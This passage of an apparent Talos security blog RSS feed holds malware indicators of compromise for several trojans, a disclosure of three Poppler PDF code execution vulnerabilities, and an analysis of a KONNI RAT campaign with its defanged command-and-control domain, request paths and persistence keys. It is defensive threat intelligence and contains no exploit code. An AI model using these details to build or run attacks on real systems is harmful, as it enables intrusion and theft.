src="https://1.bp.blogspot.com/-TcREmaXCxOQ/WV-rjACVPvI/AAAAAAAAAT8/t9wltmq9husP4BiYORehazAZCua39otSgCLcBGAs/s320/Win_Trojan_Fileinfector_67_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-JQAip_0euG8/WV-roDDox-I/AAAAAAAAAUA/GUo-I00SyWEd-6laRw_WOFCPxC6zIsiCQCLcBGAs/s1600/Win_Trojan_Fileinfector_67_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="450" data-original-width="1091" height="262" src="https://4.bp.blogspot.com/-JQAip_0euG8/WV-roDDox-I/AAAAAAAAAUA/GUo-I00SyWEd-6laRw_WOFCPxC6zIsiCQCLcBGAs/s640/Win_Trojan_Fileinfector_67_tg.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Fynloski-6332091-0&lt;/h3&gt;&lt;br /&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;c4f40c367320fcdc570a23c70d18a343&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;c4f40c367320fcdc570a23c70d18a343&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\c4f40c367320fcdc570a23c70d18a343.exe&lt;/li&gt;&lt;li&gt;%SystemDrive%\Documents and Settings\Administrator\Start Menu\Programs\Startup\x.vbs&lt;/li&gt;&lt;li&gt;%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs&lt;/li&gt;&lt;li&gt;%TEMP%\IXP000.TMP\1.xyz&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;7f7811f54a31936ac15ee95d8839d763ada89ff3a80aa7479c7ea670b1a382c5&lt;/li&gt;&lt;li&gt;1b2149951adf10d725ad54bd262b4bcc7ca44be5986ce1414fa95082606811c8&lt;/li&gt;&lt;li&gt;7e9a837489b93a6f16385bd4e604923a1e4fa9c72a7d0ee1017037f26b02ed90&lt;/li&gt;&lt;li&gt;7077931eaa70834cb3a9862b6e405ea945459fda20d60ceb83b54a0e4a9f209f&lt;/li&gt;&lt;li&gt;77654b410cf65ec4e4e7b46cdef9c0df8397349cb351fa070bc9b64bdd6e83e1&lt;/li&gt;&lt;li&gt;83768ae6bc29747d33f106d36d12f59771a0333a997bd4b6eeaadd6b0a586f63&lt;/li&gt;&lt;li&gt;e9642b9759686add2d022f0f3ac0ae5c2f5efe6a2cc5bef57f9480acb4792e6b&lt;/li&gt;&lt;li&gt;ca006c5f27586648e44c1204f49ac555f9f4ddfd5a74af19104b031fd241adf8&lt;/li&gt;&lt;li&gt;ad8472fbcf4ba8f6e9c7c275a64cdf364dabebdb7b9fc950cecce980a551ba48&lt;/li&gt;&lt;li&gt;b3ea382eb9047ad9ba10956dbd580e70d08d027ca49504a78a24d98aed623de5&lt;/li&gt;&lt;li&gt;e8415def78f91ca7b6e6dab7e6efc24eedeaf8f363af66b59b4fe1bc5ed24384&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-0lqSlixFz6w/WRNEvDBYhOI/AAAAAAAAA8g/ipzkzUpN9Ioo6QWiDDftf95zMLP66gt9QCLcB/s1600/amp-threatgrid-proxy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://2.bp.blogspot.com/-0lqSlixFz6w/WRNEvDBYhOI/AAAAAAAAA8g/ipzkzUpN9Ioo6QWiDDftf95zMLP66gt9QCLcB/s1600/amp-threatgrid-proxy.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;h4&gt;&amp;nbsp;&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-6ddqqWSTkzc/WV-r1bwxTFI/AAAAAAAAAUE/-NiX4lWceiclvu8OaB0f3vhl9P161c1EQCLcBGAs/s1600/7f7811f54a31936ac15ee95d8839d763ada89ff3a80aa7479c7ea670b1a382c5_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" src="https://1.bp.blogspot.com/-6ddqqWSTkzc/WV-r1bwxTFI/AAAAAAAAAUE/-NiX4lWceiclvu8OaB0f3vhl9P161c1EQCLcBGAs/s320/7f7811f54a31936ac15ee95d8839d763ada89ff3a80aa7479c7ea670b1a382c5_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-cJgShVMw9CA/WV-r5vI9PHI/AAAAAAAAAUI/2vnRnsWxkX0QVPzOMYUyxWlSKABUBy3XgCLcBGAs/s1600/7f7811f54a31936ac15ee95d8839d763ada89ff3a80aa7479c7ea670b1a382c5_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1101" data-original-width="1237" height="568" src="https://3.bp.blogspot.com/-cJgShVMw9CA/WV-r5vI9PHI/AAAAAAAAAUI/2vnRnsWxkX0QVPzOMYUyxWlSKABUBy3XgCLcBGAs/s640/7f7811f54a31936ac15ee95d8839d763ada89ff3a80aa7479c7ea670b1a382c5_threatgrid.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Siggen-6261194-0&lt;/h3&gt;&lt;br /&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SYSTEM\CONTROLSET001\SERVICES\MPSSVC\PARAMETERS\PORTKEYWORDS\DHCP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;Collection&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Local\MSCTF.Asm.MutexDefault1&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;13[.]65[.]245[.]138&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;time[.]windows[.]com&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;\TEMP\filename.exe&lt;/li&gt;&lt;li&gt;%System32%\wdi\{ffc42108-4920-4acf-a4fc-8abdcc68ada4}\{debd4f12-5573-4e21-a11a-2adccd61a055}\snapshot.etl&lt;/li&gt;&lt;li&gt;%System32%\wdi\LogFiles\WdiContextLog.etl.001&lt;/li&gt;&lt;li&gt;%System32%\wdi\{533a67eb-9fb5-473d-b884-958cf4b9c4a3}\{bc3d8877-b46d-4746-b041-b538af5e2cf0}\snapshot.etl&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;b4a615cd2cc1299da98059f2164e69d4b20fcd4179acd672153e6533b9c95709&lt;/li&gt;&lt;li&gt;f59c0ffee54d23875a039b546a1827c3bc40c45aee5a4887e6c8515e96d4169f&lt;/li&gt;&lt;li&gt;e38d7a959a6957ae51733a4f8b28e7514c4f1cbb5faf2f6314d7b17c69eef155&lt;/li&gt;&lt;li&gt;b3cd047683dc8944c9d9765d2e73c25c5ac1b7bba39f6b4ff748849b9a3d091b&lt;/li&gt;&lt;li&gt;4bcadb728a4948f945738f4d704c3f63525952ce8e6894aa6634de6e33a0d961&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-lMcm16MfzdA/WRTPVW_BAII/AAAAAAAAA9I/TUwW9Ai4QFAh5FURDnAbZJXWJ_Pc0etyACLcB/s1600/amp-esa-proxy-tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://4.bp.blogspot.com/-lMcm16MfzdA/WRTPVW_BAII/AAAAAAAAA9I/TUwW9Ai4QFAh5FURDnAbZJXWJ_Pc0etyACLcB/s1600/amp-esa-proxy-tg.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;h4&gt;&amp;nbsp;&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-kjhq22zzOoQ/WV-sHyh75eI/AAAAAAAAAUM/Pers_f-TNSU4sFUUgACnOO9DU9DWo6ruACLcBGAs/s1600/Win_Trojan_Siggen_6261194_0_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="408" data-original-width="606" height="215" src="https://2.bp.blogspot.com/-kjhq22zzOoQ/WV-sHyh75eI/AAAAAAAAAUM/Pers_f-TNSU4sFUUgACnOO9DU9DWo6ruACLcBGAs/s320/Win_Trojan_Siggen_6261194_0_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-9aiYbUSqGH8/WV-sRKx0mZI/AAAAAAAAAUQ/OcrW9XPKKtQJ-JcUUqNE5u2wvbBtjJlZwCLcBGAs/s1600/Win_Trojan_Siggen_6261194_0_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="372" data-original-width="1600" height="148" src="https://2.bp.blogspot.com/-9aiYbUSqGH8/WV-sRKx0mZI/AAAAAAAAAUQ/OcrW9XPKKtQJ-JcUUqNE5u2wvbBtjJlZwCLcBGAs/s640/Win_Trojan_Siggen_6261194_0_tg.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=AyMUnI59ekI:_2GvhsnwHt8:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/AyMUnI59ekI" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-07-07T12:30:39.115-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://1.bp.blogspot.com/-Eas_0o48AY8/WOf0Ghq59bI/AAAAAAAAAyo/KBeOsopaYkUQ67bPqp3x5EUBpiJaGjx6gCLcB/s72-c/no-netsec-proxy.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/07/threat-roundup-0630-0707.html</feedburner:origLink></item><item><title>Vulnerability Spotlight: TALOS-2017-0311,0319,0321 - Multiple Remote Code Execution Vulnerability in Poppler PDF library</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/Epb7zux15g4/vulnerability-spotlight-talos-2017.html</link><author>noreply@blogger.com (Holger Unterbrink)</author><pubDate>Fri, 07 Jul 2017 08:27:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-44483046434571940</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Vulnerability discovered by Marcin Noga, Lilith Wyatt and Aleksandar Nikolic of Cisco Talos.&lt;br /&gt;&lt;br /&gt;&lt;h3 style="text-align: left;"&gt;Overview&lt;/h3&gt;Talos has discovered multiple vulnerabilities in the freedesktop.org Poppler PDF library. Exploiting these vulnerabilities can allow an attacker to gain full control over the victim's machine. If an attacker builds a specially crafted PDF document and the victim opens it, the attackers code will be executed with the privileges of the local user. &lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;h3 style="text-align: left;"&gt;Details&lt;/h3&gt;&lt;div style="text-align: left;"&gt;Poppler is a shared library for displaying PDF files, used as middleware within different enterprise and open source solutions (e.g. Gimp). It is forked off from XPDF and is a complete implementation of the PDF ISO standard. Talos identified three remote code execution vulnerabilities in the Poppler library.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;TALOS-2017-0311 / CVE-2017-2814&lt;/b&gt; - Poppler PDF Image Display DCTStream::readScan() Code Execution Vulnerability&lt;br /&gt;&lt;br /&gt;An exploitable heap overflow vulnerability exists in the image rendering functionality of Poppler-0.53.0. A specifically crafted PDF can cause an image resizing after allocation has already occurred, resulting in a heap corruption triggered in the DCTStream::readScan() function. This can lead to code execution with the local user rights.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;TALOS-2017-0319 / CVE-2017-2818&lt;/b&gt; - Poppler PDF Image Display DCTStream::readProgressiveSOF() Code Execution Vulnerability&lt;br /&gt;&lt;br /&gt;Talos found an exploitable heap overflow vulnerability in the image rendering functionality of Poppler-0.53.0. A specifically crafted PDF can cause an overly large number of color components during image rendering, resulting in a heap corruption. This can be used by an attacker to craft a PDF file that executes malicious code on the victim's computer with the rights of the local user.&lt;br /&gt;&lt;br /&gt;This vulnerability was formerly found (CVE-2005-3627), with a fix applied to DCTStream::readBaselineSOF, however the bug was missed in the readProgressiveSOF function.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;TALOS-2017-0321 / CVE-2017-2820 - &lt;/b&gt;&lt;span id="summary_alias_container"&gt;&lt;span id="short_desc_nonedit_display"&gt;Poppler PDF library JPEG2000 levels Code Execution Vulnerability&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;Talos discovered an exploitable integer overflow vulnerability in the JPEG 2000 image parsing functionality of the Poppler 0.53.0 library. An attacker can build a specially crafted PDF file that uses this bug to trigger an integer overflow. Later in the code execution flow, this can lead to memory getting overwritten on the heap resulting in a potential arbitrary code execution with the rights of the local user. Like with the other two vulnerabilities before, a victim must open the malicious PDF in an application using this library to exploit this vulnerability. One example of a vulnerable application is the default PDF reader Evince, shipped with the latest version of Ubuntu Linux. &lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;h3 style="text-align: left;"&gt;Additional Notes&lt;/h3&gt;We would like to highlight that TALOS-2017-0311 and TALOS-2017-0321 are in Poppler's internal, unmaintained JPEG and JPEG2000 decoders which shouldn't ever be used. Even Poppler’s documentation strongly suggests not using them. It is highly recommended to build the Poppler library with more robust and up to date external implementations such as libjpeg and openjpeg. However, Ubuntu does not do this by default for JPEG2000 and will use the unmaintained code, thus making Ubuntu-compiled versions vulnerable to these issues.&lt;br /&gt;&lt;br /&gt;Talos is seeing client side attacks based on malicious PDF files on a daily base. If your company is using a Popper based application, it is possible that an attacker could use one of these vulnerabilities against it in a targeted attack. This shows how important it is to keep all applications up to date and not only the operation system.&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;More technical details can be found in the Talos Vulnerability Reports:&amp;nbsp;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0311"&gt;TALOS-2017-0311&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0319"&gt;TALOS-2017-0319&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0321"&gt;TALOS-2017-0321&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Coverage&lt;/h3&gt;&lt;div style="text-align: left;"&gt;The following Snort Rules will detect exploitation attempts of this vulnerability. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org&lt;br /&gt;&lt;br /&gt;Snort rules:&amp;nbsp; 42273-42274, 42319 - 42320 , 42352-42353&lt;/div&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=Epb7zux15g4:WfmtXYq2U6Y:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/Epb7zux15g4" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-07-07T11:27:54.735-04:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/07/vulnerability-spotlight-talos-2017.html</feedburner:origLink></item><item><title>New KONNI Campaign References North Korean Missile Capabilities</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/GZVq9S5Btyo/konni-references-north-korean-missile-capabilities.html</link><category>APT</category><category>KONNI</category><category>Korea</category><category>Malware</category><category>Malware Analysis</category><category>RAT</category><author>noreply@blogger.com (Paul Rascagneres)</author><pubDate>Thu, 06 Jul 2017 00:58:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-8430048326002065342</guid><description>This blog was authored by &lt;a href="https://www.blogger.com/profile/10073079939160046441"&gt;Paul Rascagneres&lt;/a&gt;&lt;br /&gt;&lt;h3 id="h.nkgrhhxwl5h8"&gt;Executive Summary&lt;/h3&gt;&lt;br /&gt;We recently wrote about the &lt;a href="http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html"&gt;KONNI Remote Access Trojan&lt;/a&gt; (RAT) which has been distributed by a small number of campaigns over the past 3 years. We have identified a new distribution campaign which took place on 4th July. The malware used in this campaign has similar features to that distributed earlier in 2017 with the following changes:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;A new decoy document copy/pasted from an article published on the 3rd of July by &lt;a href="http://english.yonhapnews.co.kr/news/2017/07/03/0200000000AEN20170703005100315.html"&gt;Yonhap News Agency&lt;/a&gt; in Korea;&lt;/li&gt;&lt;li&gt;The dropper includes a 64 bit version of KONNI;&lt;/li&gt;&lt;li&gt;A new CC infrastructure consisting of a climbing club website.&lt;/li&gt;&lt;/ul&gt;North Korea conducted a test missile launch on 3rd July. This campaign appears to be directly related to the launch and the ensuing discussion of North Korean missile technology. This is consistent with previous KONNI distribution campaigns which have also frequently mentioned North Korea.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;h3 id="h.vzxos1cq0nxj"&gt;"N.K. marks anniversary of strategic force, touting missile capabilities" campaign&lt;/h3&gt;&lt;br /&gt;We identified an executable file, SHA-256 hash sum: 33f828ad462c414b149f14f16615ce25bd078630eee36ad953950e0da2e2cc90, which when opened displays the following Office document:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-82_5hKivejo/WV3W_IpsSJI/AAAAAAAAAJE/IX_3APJpsjMuk8GitdpUQE4Lc4Hk669WQCLcBGAs/s1600/image3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="743" data-original-width="1117" height="424" src="https://4.bp.blogspot.com/-82_5hKivejo/WV3W_IpsSJI/AAAAAAAAAJE/IX_3APJpsjMuk8GitdpUQE4Lc4Hk669WQCLcBGAs/s640/image3.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;The content of the document is a copy/pasted from an article published on July 3rd  by &lt;a href="http://english.yonhapnews.co.kr/news/2017/07/03/0200000000AEN20170703005100315.html"&gt;Yonhap News Agency&lt;/a&gt; in Korea. In addition to displaying this document, the malicious executable also drops 2 different versions of KONNI:&lt;br /&gt;&lt;pre&gt;C:\Users\Users\AppData\Local\MFAData\event\eventlog.dll (64 bit)&lt;br /&gt;C:\Users\Users\AppData\Local\MFAData\event\errorevent.dll (32 bit)&lt;br /&gt;&lt;/pre&gt;On 64 bit versions of Windows, both files are dropped; on 32 bit versions of Windows, only errorevent.dll, the 32 bit version is dropped. Unlike previous campaigns, both binaries are packed with ASPack. In both cases, the dropped malware is immediately executed via rundll32.exe with one of the following registry keys created to ensure that the malware persists and is executed on rebooting the compromised system:&lt;br /&gt;&lt;pre&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RTHDVCPE&lt;br /&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RTHDVCP&lt;br /&gt;&lt;/pre&gt;This attack uses a new Command &amp;amp; Control infrastructure hosted on the following domain:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;member-daumchk[.]netai[.]net&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;The CnC traffic of KONNI takes place as HTTP post requests to web pages hosted as /weget/download.php,  /weget/uploadtm.php or /weget/upload.php on the domain itself.&lt;br /&gt;&lt;br /&gt;The attackers have gone to some effort to disguise the website as a legitimate climbing club.&lt;br /&gt;&lt;br /&gt;Here is a screenshot of the website:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-ipfz-ZYGkqI/WV3XSYLUnTI/AAAAAAAAAJI/CJf2R3Hvo6k7V01ZRLZQgBgi_np5JQlhQCLcBGAs/s1600/image4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="798" data-original-width="1262" height="403" src="https://2.bp.blogspot.com/-ipfz-ZYGkqI/WV3XSYLUnTI/AAAAAAAAAJI/CJf2R3Hvo6k7V01ZRLZQgBgi_np5JQlhQCLcBGAs/s640/image4.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;However, the website does not contain real text, only the default text of the Content Management System (CMS).&lt;br /&gt;&lt;br /&gt;Additionally, the website contains a contacts section with an address in USA, but the map below the address is in Korean and points to a location in Seoul, South Korea:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-5s8wIm7-EUY/WV3Xah1pEhI/AAAAAAAAAJM/iHaL9iBqq2YyDG5DSY0JIxLTbEf0no-sgCLcBGAs/s1600/image2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1202" data-original-width="1600" height="480" src="https://1.bp.blogspot.com/-5s8wIm7-EUY/WV3Xah1pEhI/AAAAAAAAAJM/iHaL9iBqq2YyDG5DSY0JIxLTbEf0no-sgCLcBGAs/s640/image2.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 id="h.fnfv7rj9c1jx"&gt;Conclusion&lt;/h3&gt;&lt;br /&gt;The KONNI malware distributed as part of this campaign is similar to previous versions that we have identified this year. The attackers have added a 64 bit version and used a packer to complicate analysis. This campaign is directly related to current events and is clearly 'fresh'. The binary was compiled on July 4th, the decoy document was published on July 3rd. &lt;br /&gt;&lt;br /&gt;The threat actors associated with KONNI typically use decoy documents relating to North Korea, and this campaign is no exception. However, in contrast to the convincing decoy document lifted from a third party, the content of the decoy website hosted on the CnC server does not look legitimate. The text content is not consistent with the website navigation, and the contacts page contains a mis-match of a US address with a Korean map.  &lt;br /&gt;&lt;br /&gt;Nevertheless, this threat actor continues to remain active, and continues to develop updated versions of their malware. Organisations which may have an interest in the contents of this decoy document, and that used in previous campaigns should ensure that they are adequately protected against this and subsequent campaigns.&lt;br /&gt;&lt;br /&gt;&lt;h3 id="h.djrmnj5u9hb0"&gt;Coverage&lt;br /&gt;&lt;/h3&gt;&lt;br /&gt;Additional ways our customers can detect and block this threat are listed below.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-VBEcK350naE/WV3XgfMyLjI/AAAAAAAAAJQ/Ycf4KrzzH7UUXmPSgZ8BjaZp8YNlz2ZSQCLcBGAs/s1600/image1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="239" data-original-width="320" src="https://4.bp.blogspot.com/-VBEcK350naE/WV3XgfMyLjI/AAAAAAAAAJQ/Ycf4KrzzH7UUXmPSgZ8BjaZp8YNlz2ZSQCLcBGAs/s1600/image1.png" /&gt;&lt;/a&gt;&lt;/div&gt;Advanced Malware Protection (&lt;a href="https://www.cisco.com/c/en/us/support/security/amp-firepower-software-license/tsd-products-support-series-home.html"&gt;AMP&lt;/a&gt;) is ideally suited to prevent the execution of the malware used by these threat actors.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html"&gt;CWS &lt;/a&gt;or &lt;a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html"&gt;WSA &lt;/a&gt;web scanning prevents access to malicious websites and detects malware used in these attacks.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html"&gt;Email Security&lt;/a&gt; can block malicious emails sent by threat actors as part of their campaign.&lt;br /&gt;&lt;br /&gt;The Network Security protection of &lt;a href="https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html"&gt;IPS &lt;/a&gt;and &lt;a href="https://www.cisco.com/c/en/us/products/security/asa-next-generation-firewall-services/index.html"&gt;NGFW &lt;/a&gt;have up-to-date signatures to detect malicious network activity by threat actors.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html"&gt;AMP Threat Grid&lt;/a&gt; helps identify malicious binaries and build protection into all Cisco Security products.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://umbrella.cisco.com/"&gt;Umbrella&lt;/a&gt;, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network&lt;br /&gt;&lt;br /&gt;&lt;h3 id="h.1i2a6hyg44po"&gt;IOC&lt;/h3&gt;&lt;h4 id="h.yvcs2iexanix"&gt;File hashes&lt;/h4&gt;&lt;ul&gt;&lt;li&gt;Dropper: 33f828ad462c414b149f14f16615ce25bd078630eee36ad953950e0da2e2cc90&lt;/li&gt;&lt;li&gt;32 Bits binary: 290b1e2415f88fc3dd1d53db3ba90c4a760cf645526c8240af650751b1652b8a&lt;/li&gt;&lt;li&gt;64 bits binary: 